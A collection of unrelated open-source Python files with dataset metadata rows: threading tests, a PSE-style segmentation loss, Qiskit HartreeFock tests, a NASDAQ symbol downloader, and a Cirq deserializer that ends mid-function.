# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
| 34.859504 | 88 | 0.567172 |
e59ee03887e39486e764c274913d28458eeb1d02 | 4,284 | py | Python | network/Seg_loss.py | robtu328/TextBPN | 225844770e0107817be9fb86d53f873fa3eb07ae | [
"MIT"
] | 49 | 2021-07-28T03:21:35.000Z | 2022-03-31T13:19:32.000Z | network/Seg_loss.py | robtu328/TextBPN | 225844770e0107817be9fb86d53f873fa3eb07ae | [
"MIT"
] | 4 | 2021-11-15T09:32:30.000Z | 2022-03-26T05:30:37.000Z | network/Seg_loss.py | robtu328/TextBPN | 225844770e0107817be9fb86d53f873fa3eb07ae | [
"MIT"
] | 5 | 2021-10-16T08:03:40.000Z | 2022-01-16T17:57:25.000Z | # -*- coding: utf-8 -*-
# @Time : 3/29/19 11:03 AM
# @Author : zhoujun
import torch
from torch import nn
import numpy as np
class SegmentLoss(nn.Module):
def __init__(self, Lambda, ratio=3, reduction='mean'):
"""Implement PSE Loss.
"""
super(SegmentLoss, self).__init__()
assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
self.Lambda = Lambda
self.ratio = ratio
self.reduction = reduction
def forward(self, outputs, labels, training_masks, th=0.5):
texts = outputs[:, -1, :, :]
kernels = outputs[:, :-1, :, :]
gt_texts = labels[:, -1, :, :]
gt_kernels = labels[:, :-1, :, :]
selected_masks = self.ohem_batch(texts, gt_texts, training_masks)
selected_masks = selected_masks.to(outputs.device)
loss_text = self.dice_loss(texts, gt_texts, selected_masks)
loss_kernels = []
# mask0 = torch.sigmoid(texts).data.cpu().numpy()
mask0 = texts.data.cpu().numpy()
mask1 = training_masks.data.cpu().numpy()
selected_masks = ((mask0 > th) & (mask1 > th)).astype('float32')
selected_masks = torch.from_numpy(selected_masks).float()
selected_masks = selected_masks.to(outputs.device)
kernels_num = gt_kernels.size()[1]
for i in range(kernels_num):
kernel_i = kernels[:, i, :, :]
gt_kernel_i = gt_kernels[:, i, :, :]
loss_kernel_i = self.dice_loss(kernel_i, gt_kernel_i, selected_masks)
loss_kernels.append(loss_kernel_i)
loss_kernels = torch.stack(loss_kernels).mean(0)
if self.reduction == 'mean':
loss_text = loss_text.mean()
loss_kernels = loss_kernels.mean()
elif self.reduction == 'sum':
loss_text = loss_text.sum()
loss_kernels = loss_kernels.sum()
loss = self.Lambda *loss_text + (1-self.Lambda)*loss_kernels
return loss_text, loss_kernels, loss
def dice_loss(self, input, target, mask):
# input = torch.sigmoid(input)
input = input.contiguous().view(input.size()[0], -1)
target = target.contiguous().view(target.size()[0], -1)
mask = mask.contiguous().view(mask.size()[0], -1)
input = input * mask
target = (target.float()) * mask
a = torch.sum(input * target, 1)
b = torch.sum(input * input, 1) + 0.001
c = torch.sum(target * target, 1) + 0.001
d = (2 * a) / (b + c)
return 1 - d
def ohem_single(self, score, gt_text, training_mask, th=0.5):
pos_num = (int)(np.sum(gt_text > th)) - (int)(np.sum((gt_text > th) & (training_mask <= th)))
if pos_num == 0:
# selected_mask = gt_text.copy() * 0 # may be not good
selected_mask = training_mask
selected_mask = selected_mask.reshape(1, selected_mask.shape[0], selected_mask.shape[1]).astype('float32')
return selected_mask
neg_num = (int)(np.sum(gt_text <= th))
neg_num = (int)(min(pos_num * 3, neg_num))
if neg_num == 0:
selected_mask = training_mask
selected_mask = selected_mask.reshape(1, selected_mask.shape[0], selected_mask.shape[1]).astype('float32')
return selected_mask
neg_score = score[gt_text <= th]
# 将负样本得分从高到低排序
neg_score_sorted = np.sort(-neg_score)
threshold = -neg_score_sorted[neg_num - 1]
# 选出 得分高的 负样本 和正样本 的 mask
selected_mask = ((score >= threshold) | (gt_text > th)) & (training_mask > th)
selected_mask = selected_mask.reshape(1, selected_mask.shape[0], selected_mask.shape[1]).astype('float32')
return selected_mask
def ohem_batch(self, scores, gt_texts, training_masks):
scores = scores.data.cpu().numpy()
gt_texts = gt_texts.data.cpu().numpy()
training_masks = training_masks.data.cpu().numpy()
selected_masks = []
for i in range(scores.shape[0]):
selected_masks.append(self.ohem_single(scores[i, :, :], gt_texts[i, :, :], training_masks[i, :, :]))
selected_masks = np.concatenate(selected_masks, 0)
selected_masks = torch.from_numpy(selected_masks).float()
return selected_masks
| 39.666667 | 118 | 0.599907 |
5120104319ce0101675f0d0befdd86b523b53ebc | 475 | py | Python | starter_app/apps.py | reorx/django_starter_pack | 5931c880d6b51159d20a060e72869d9d009091bb | [
"MIT"
] | 2 | 2021-01-18T15:39:57.000Z | 2021-01-19T01:57:27.000Z | starter_app/apps.py | reorx/django_starter_pack | 5931c880d6b51159d20a060e72869d9d009091bb | [
"MIT"
] | null | null | null | starter_app/apps.py | reorx/django_starter_pack | 5931c880d6b51159d20a060e72869d9d009091bb | [
"MIT"
] | 2 | 2021-01-18T11:21:05.000Z | 2021-01-18T12:38:55.000Z | from django.apps import AppConfig as BaseAppConfig
from importlib import import_module
SUBAPPS = [
'contact',
]
class AppConfig(BaseAppConfig):
name = 'starter_app'
# WARN not compatible for django < 1.11
def import_models(self):
self.models = self.apps.all_models[self.label]
models_module = None
for i in SUBAPPS:
models_module = import_module(f'{self.name}.{i}.models')
self.models_module = models_module
| 21.590909 | 68 | 0.673684 |
7a92930b85a4d3e6434fa45ba1f0ef0f0c294060 | 304 | py | Python | cenv_tool/__init__.py | oozut/cenv_tool | a02977dc80a54c0045785ad97284fde0b9248aff | [
"MIT"
] | null | null | null | cenv_tool/__init__.py | oozut/cenv_tool | a02977dc80a54c0045785ad97284fde0b9248aff | [
"MIT"
] | null | null | null | cenv_tool/__init__.py | oozut/cenv_tool | a02977dc80a54c0045785ad97284fde0b9248aff | [
"MIT"
] | 1 | 2020-10-01T22:08:17.000Z | 2020-10-01T22:08:17.000Z | # -*- coding: utf-8 -*-
"""Conda environment creation and update from meta.yaml."""
from pkg_resources import DistributionNotFound
from pkg_resources import get_distribution
try:
__version__ = get_distribution('cenv_tool').version
except (AttributeError, DistributionNotFound):
__version__ = ''
| 30.4 | 59 | 0.769737 |
055b634466c000255c418911e42392957f2433a4 | 4,844 | py | Python | test/chemistry/test_initial_state_hartree_fock.py | gabrieleagl/qiskit-aqua | 521d505a6483985c039dcfb71f7d517471cff441 | [
"Apache-2.0"
] | null | null | null | test/chemistry/test_initial_state_hartree_fock.py | gabrieleagl/qiskit-aqua | 521d505a6483985c039dcfb71f7d517471cff441 | [
"Apache-2.0"
] | null | null | null | test/chemistry/test_initial_state_hartree_fock.py | gabrieleagl/qiskit-aqua | 521d505a6483985c039dcfb71f7d517471cff441 | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Initial State HartreeFock """
import unittest
from test.chemistry import QiskitChemistryTestCase
import numpy as np
from ddt import ddt, idata, unpack
from qiskit.chemistry.components.initial_states import HartreeFock
from qiskit.aqua.operators.legacy import op_converter
from qiskit.chemistry import QiskitChemistryError
from qiskit.chemistry.drivers import PySCFDriver, UnitsType
from qiskit.chemistry.core import Hamiltonian, TransformationType, QubitMappingType
@ddt
class TestInitialStateHartreeFock(QiskitChemistryTestCase):
""" Initial State HartreeFock tests """
def test_qubits_4_jw_h2(self):
""" qubits 4 jw h2 test """
hrfo = HartreeFock(4, [1, 1], 'jordan_wigner', False)
cct = hrfo.construct_circuit('vector')
np.testing.assert_array_equal(cct, [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
def test_qubits_4_py_h2(self):
""" qubits 4 py h2 test """
hrfo = HartreeFock(4, [1, 1], 'parity', False)
cct = hrfo.construct_circuit('vector')
np.testing.assert_array_equal(cct, [0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
def test_qubits_4_bk_h2(self):
""" qubits 4 bk h2 test """
hrfo = HartreeFock(4, [1, 1], 'bravyi_kitaev', False)
cct = hrfo.construct_circuit('vector')
np.testing.assert_array_equal(cct, [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
def test_qubits_2_py_h2(self):
""" qubits 2 py h2 test """
hrfo = HartreeFock(4, 2, 'parity', True)
cct = hrfo.construct_circuit('vector')
np.testing.assert_array_equal(cct, [0.0, 1.0, 0.0, 0.0])
def test_qubits_2_py_h2_cct(self):
""" qubits 2 py h2 cct test """
hrfo = HartreeFock(4, [1, 1], 'parity', True)
cct = hrfo.construct_circuit('circuit')
self.assertEqual(cct.qasm(), 'OPENQASM 2.0;\ninclude "qelib1.inc";\nqreg q[2];\n'
'x q[0];\n')
def test_qubits_6_py_lih_cct(self):
""" qubits 6 py lih cct test """
hrfo = HartreeFock(10, [1, 1], 'parity', True, [1, 2])
cct = hrfo.construct_circuit('circuit')
self.assertEqual(cct.qasm(), 'OPENQASM 2.0;\ninclude "qelib1.inc";\nqreg q[6];\n'
'x q[0];\n'
'x q[1];\n')
def test_qubits_10_bk_lih_bitstr(self):
""" qubits 10 bk lih bitstr test """
hrfo = HartreeFock(10, [1, 1], 'bravyi_kitaev', False)
bitstr = hrfo.bitstr
np.testing.assert_array_equal(bitstr,
[False, False, False, False, True,
False, True, False, True, True])
@idata([
[QubitMappingType.JORDAN_WIGNER],
[QubitMappingType.PARITY],
[QubitMappingType.BRAVYI_KITAEV]
])
@unpack
def test_hf_value(self, mapping):
""" hf value test """
try:
driver = PySCFDriver(atom='Li .0 .0 .0; H .0 .0 1.6',
unit=UnitsType.ANGSTROM,
charge=0,
spin=0,
basis='sto3g')
except QiskitChemistryError:
self.skipTest('PYSCF driver does not appear to be installed')
qmolecule = driver.run()
core = Hamiltonian(transformation=TransformationType.FULL,
qubit_mapping=mapping,
two_qubit_reduction=False,
freeze_core=False,
orbital_reduction=[])
qubit_op, _ = core.run(qmolecule)
qubit_op = op_converter.to_matrix_operator(qubit_op)
hrfo = HartreeFock(core.molecule_info['num_orbitals'],
core.molecule_info['num_particles'], mapping.value, False)
qc = hrfo.construct_circuit('vector')
hf_energy = qubit_op.evaluate_with_statevector(qc)[0].real + core._nuclear_repulsion_energy
self.assertAlmostEqual(qmolecule.hf_energy, hf_energy, places=8)
if __name__ == '__main__':
unittest.main()
| 42.121739 | 99 | 0.580306 |
2dd20a8587668eca0a17b41cfb45026806714749 | 3,437 | py | Python | Finance/Python/finance/lib/python2.7/site-packages/pandas_datareader/nasdaq_trader.py | pallavbakshi/datascience | 10f2bb2c16e6fd593e6bee437aa36098596eec25 | [
"MIT"
] | 1 | 2018-01-11T14:11:40.000Z | 2018-01-11T14:11:40.000Z | Finance/Python/finance/lib/python2.7/site-packages/pandas_datareader/nasdaq_trader.py | pallavbakshi/datascience | 10f2bb2c16e6fd593e6bee437aa36098596eec25 | [
"MIT"
] | null | null | null | Finance/Python/finance/lib/python2.7/site-packages/pandas_datareader/nasdaq_trader.py | pallavbakshi/datascience | 10f2bb2c16e6fd593e6bee437aa36098596eec25 | [
"MIT"
] | 5 | 2018-05-19T05:08:51.000Z | 2021-04-29T16:03:45.000Z | from ftplib import FTP, all_errors
from pandas import read_csv
from pandas_datareader._utils import RemoteDataError
from pandas.compat import StringIO
import time
import warnings
_NASDAQ_TICKER_LOC = '/SymbolDirectory/nasdaqtraded.txt'
_NASDAQ_FTP_SERVER = 'ftp.nasdaqtrader.com'
_TICKER_DTYPE = [('Nasdaq Traded', bool),
('Symbol', str),
('Security Name', str),
('Listing Exchange', str),
('Market Category', str),
('ETF', bool),
('Round Lot Size', float),
('Test Issue', bool),
('Financial Status', str),
('CQS Symbol', str),
('NASDAQ Symbol', str),
('NextShares', bool)]
_CATEGORICAL = ('Listing Exchange', 'Financial Status')
_DELIMITER = '|'
_ticker_cache = None
def _bool_converter(item):
return item == 'Y'
def _download_nasdaq_symbols(timeout):
"""
@param timeout: the time to wait for the FTP connection
"""
try:
ftp_session = FTP(_NASDAQ_FTP_SERVER, timeout=timeout)
ftp_session.login()
except all_errors as err:
raise RemoteDataError('Error connecting to %r: $s' %
(_NASDAQ_FTP_SERVER, err))
lines = []
try:
ftp_session.retrlines('RETR ' + _NASDAQ_TICKER_LOC, lines.append)
except all_errors as err:
raise RemoteDataError('Error downloading from %r: $s' %
(_NASDAQ_FTP_SERVER, err))
finally:
ftp_session.close()
# Sanity Checking
if not lines[-1].startswith('File Creation Time:'):
raise RemoteDataError('Missing expected footer. Found %r' % lines[-1])
# Convert Y/N to True/False.
converter_map = dict((col, _bool_converter) for col, t in _TICKER_DTYPE
if t is bool)
# For pandas >= 0.20.0, the Python parser issues a warning if
# both a converter and dtype are specified for the same column.
# However, this measure is probably temporary until the read_csv
# behavior is better formalized.
with warnings.catch_warnings(record=True):
data = read_csv(StringIO('\n'.join(lines[:-1])), '|',
dtype=_TICKER_DTYPE, converters=converter_map,
index_col=1)
# Properly cast enumerations
for cat in _CATEGORICAL:
data[cat] = data[cat].astype('category')
return data
def get_nasdaq_symbols(retry_count=3, timeout=30, pause=None):
"""
Get the list of all available equity symbols from Nasdaq.
Returns
-------
nasdaq_tickers : pandas.DataFrame
DataFrame with company tickers, names, and other properties.
"""
global _ticker_cache
if timeout < 0:
raise ValueError('timeout must be >= 0, not %r' % (timeout,))
if pause is None:
pause = timeout / 3
elif pause < 0:
raise ValueError('pause must be >= 0, not %r' % (pause,))
if _ticker_cache is None:
while retry_count > 0:
try:
_ticker_cache = _download_nasdaq_symbols(timeout=timeout)
retry_count = -1
except RemoteDataError:
# retry on any exception
if retry_count <= 0:
raise
else:
retry_count -= 1
time.sleep(pause)
return _ticker_cache
| 31.245455 | 78 | 0.586849 |
6ed77a59d96ded565b7124aa205d4c4b0dc94dcb | 12,590 | py | Python | cirq-google/cirq_google/serialization/op_deserializer.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-google/cirq_google/serialization/op_deserializer.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-google/cirq_google/serialization/op_deserializer.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import (
Any,
Callable,
Dict,
List,
Optional,
Sequence,
)
from dataclasses import dataclass
import abc
import sympy
import cirq
from cirq_google.api import v2
from cirq_google.ops.calibration_tag import CalibrationTag
from cirq_google.serialization import arg_func_langs
class OpDeserializer(abc.ABC):
"""Generic supertype for operation deserializers.
Each operation deserializer describes how to deserialize operation protos
with a particular `serialized_id` to a specific type of Cirq operation.
"""
@property
@abc.abstractmethod
def serialized_id(self) -> str:
"""Returns the string identifier for the accepted serialized objects.
This ID denotes the serialization format this deserializer consumes. For
example, one of the common deserializers converts objects with the id
'xy' into PhasedXPowGates.
"""
@abc.abstractmethod
def from_proto(
self,
proto,
*,
arg_function_language: str = '',
constants: List[v2.program_pb2.Constant] = None,
deserialized_constants: List[Any] = None,
) -> cirq.Operation:
"""Converts a proto-formatted operation into a Cirq operation.
Args:
proto: The proto object to be deserialized.
arg_function_language: The `arg_function_language` field from
`Program.Language`.
constants: The list of Constant protos referenced by constant
table indices in `proto`.
deserialized_constants: The deserialized contents of `constants`.
Returns:
The deserialized operation represented by `proto`.
"""
@dataclass(frozen=True)
class DeserializingArg:
"""Specification of the arguments to deserialize an argument to a gate.
Args:
serialized_name: The serialized name of the gate that is being
deserialized.
constructor_arg_name: The name of the argument in the constructor of
the gate corresponding to this serialized argument.
value_func: Sometimes a value from the serialized proto needs to
converted to an appropriate type or form. This function takes the
serialized value and returns the appropriate type. Defaults to
None.
required: Whether a value must be specified when constructing the
deserialized gate. Defaults to True.
default: default value to set if the value is not present in the
arg. If set, required is ignored.
"""
serialized_name: str
constructor_arg_name: str
value_func: Optional[Callable[[arg_func_langs.ARG_LIKE], Any]] = None
required: bool = True
default: Any = None
class GateOpDeserializer(OpDeserializer):
"""Describes how to deserialize a proto to a given Gate type.
Attributes:
serialized_gate_id: The id used when serializing the gate.
"""
def __init__(
self,
serialized_gate_id: str,
gate_constructor: Callable,
args: Sequence[DeserializingArg],
num_qubits_param: Optional[str] = None,
op_wrapper: Callable[
[cirq.Operation, v2.program_pb2.Operation], cirq.Operation
] = lambda x, y: x,
deserialize_tokens: Optional[bool] = True,
):
"""Constructs a deserializer.
Args:
serialized_gate_id: The serialized id of the gate that is being
deserialized.
gate_constructor: A function that produces the deserialized gate
given arguments from args.
args: A list of the arguments to be read from the serialized
gate and the information required to use this to construct
the gate using the gate_constructor above.
num_qubits_param: Some gate constructors require that the number
of qubits be passed to their constructor. This is the name
of the parameter in the constructor for this value. If None,
no number of qubits is passed to the constructor.
op_wrapper: An optional Callable to modify the resulting
GateOperation, for instance, to add tags
deserialize_tokens: Whether to convert tokens to
CalibrationTags. Defaults to True.
"""
self._serialized_gate_id = serialized_gate_id
self._gate_constructor = gate_constructor
self._args = args
self._num_qubits_param = num_qubits_param
self._op_wrapper = op_wrapper
self._deserialize_tokens = deserialize_tokens
@property
def serialized_id(self):
return self._serialized_gate_id
# TODO(#3388) Add documentation for Raises.
# pylint: disable=missing-raises-doc
def from_proto(
self,
proto: v2.program_pb2.Operation,
*,
arg_function_language: str = '',
constants: List[v2.program_pb2.Constant] = None,
deserialized_constants: List[Any] = None, # unused
) -> cirq.Operation:
"""Turns a cirq_google.api.v2.Operation proto into a GateOperation.
Args:
proto: The proto object to be deserialized.
arg_function_language: The `arg_function_language` field from
`Program.Language`.
constants: The list of Constant protos referenced by constant
table indices in `proto`.
deserialized_constants: Unused in this method.
Returns:
The deserialized GateOperation represented by `proto`.
"""
qubits = [v2.qubit_from_proto_id(q.id) for q in proto.qubits]
args = self._args_from_proto(proto, arg_function_language=arg_function_language)
if self._num_qubits_param is not None:
args[self._num_qubits_param] = len(qubits)
gate = self._gate_constructor(**args)
op = self._op_wrapper(gate.on(*qubits), proto)
if self._deserialize_tokens:
which = proto.WhichOneof('token')
if which == 'token_constant_index':
if not constants:
raise ValueError(
'Proto has references to constants table '
'but none was passed in, value ='
f'{proto}'
)
op = op.with_tags(
CalibrationTag(constants[proto.token_constant_index].string_value)
)
elif which == 'token_value':
op = op.with_tags(CalibrationTag(proto.token_value))
return op
# pylint: enable=missing-raises-doc
def _args_from_proto(
self, proto: v2.program_pb2.Operation, *, arg_function_language: str
) -> Dict[str, arg_func_langs.ARG_LIKE]:
return_args = {}
for arg in self._args:
if arg.serialized_name not in proto.args:
if arg.default:
return_args[arg.constructor_arg_name] = arg.default
continue
elif arg.required:
raise ValueError(
f'Argument {arg.serialized_name} '
'not in deserializing args, but is required.'
)
value = arg_func_langs.arg_from_proto(
proto.args[arg.serialized_name],
arg_function_language=arg_function_language,
required_arg_name=None if not arg.required else arg.serialized_name,
)
if arg.value_func is not None:
value = arg.value_func(value)
if value is not None:
return_args[arg.constructor_arg_name] = value
return return_args
class CircuitOpDeserializer(OpDeserializer):
"""Describes how to serialize CircuitOperations."""
@property
def serialized_id(self):
return 'circuit'
# TODO(#3388) Add documentation for Raises.
# pylint: disable=missing-raises-doc
def from_proto(
self,
proto: v2.program_pb2.CircuitOperation,
*,
arg_function_language: str = '',
constants: List[v2.program_pb2.Constant] = None,
deserialized_constants: List[Any] = None,
) -> cirq.CircuitOperation:
"""Turns a cirq.google.api.v2.CircuitOperation proto into a CircuitOperation.
Args:
proto: The proto object to be deserialized.
arg_function_language: The `arg_function_language` field from
`Program.Language`.
constants: The list of Constant protos referenced by constant
table indices in `proto`. This list should already have been
parsed to produce 'deserialized_constants'.
deserialized_constants: The deserialized contents of `constants`.
Returns:
The deserialized CircuitOperation represented by `proto`.
"""
if constants is None or deserialized_constants is None:
raise ValueError(
'CircuitOp deserialization requires a constants list and a corresponding list of '
'post-deserialization values (deserialized_constants).'
)
if len(deserialized_constants) <= proto.circuit_constant_index:
raise ValueError(
f'Constant index {proto.circuit_constant_index} in CircuitOperation '
'does not appear in the deserialized_constants list '
f'(length {len(deserialized_constants)}).'
)
circuit = deserialized_constants[proto.circuit_constant_index]
if not isinstance(circuit, cirq.FrozenCircuit):
raise ValueError(
f'Constant at index {proto.circuit_constant_index} was expected to be a circuit, '
f'but it has type {type(circuit)} in the deserialized_constants list.'
)
which_rep_spec = proto.repetition_specification.WhichOneof('repetition_value')
if which_rep_spec == 'repetition_count':
rep_ids = None
repetitions = proto.repetition_specification.repetition_count
elif which_rep_spec == 'repetition_ids':
rep_ids = proto.repetition_specification.repetition_ids.ids
repetitions = len(rep_ids)
else:
rep_ids = None
repetitions = 1
qubit_map = {
v2.qubit_from_proto_id(entry.key.id): v2.qubit_from_proto_id(entry.value.id)
for entry in proto.qubit_map.entries
}
measurement_key_map = {
entry.key.string_key: entry.value.string_key
for entry in proto.measurement_key_map.entries
}
arg_map = {
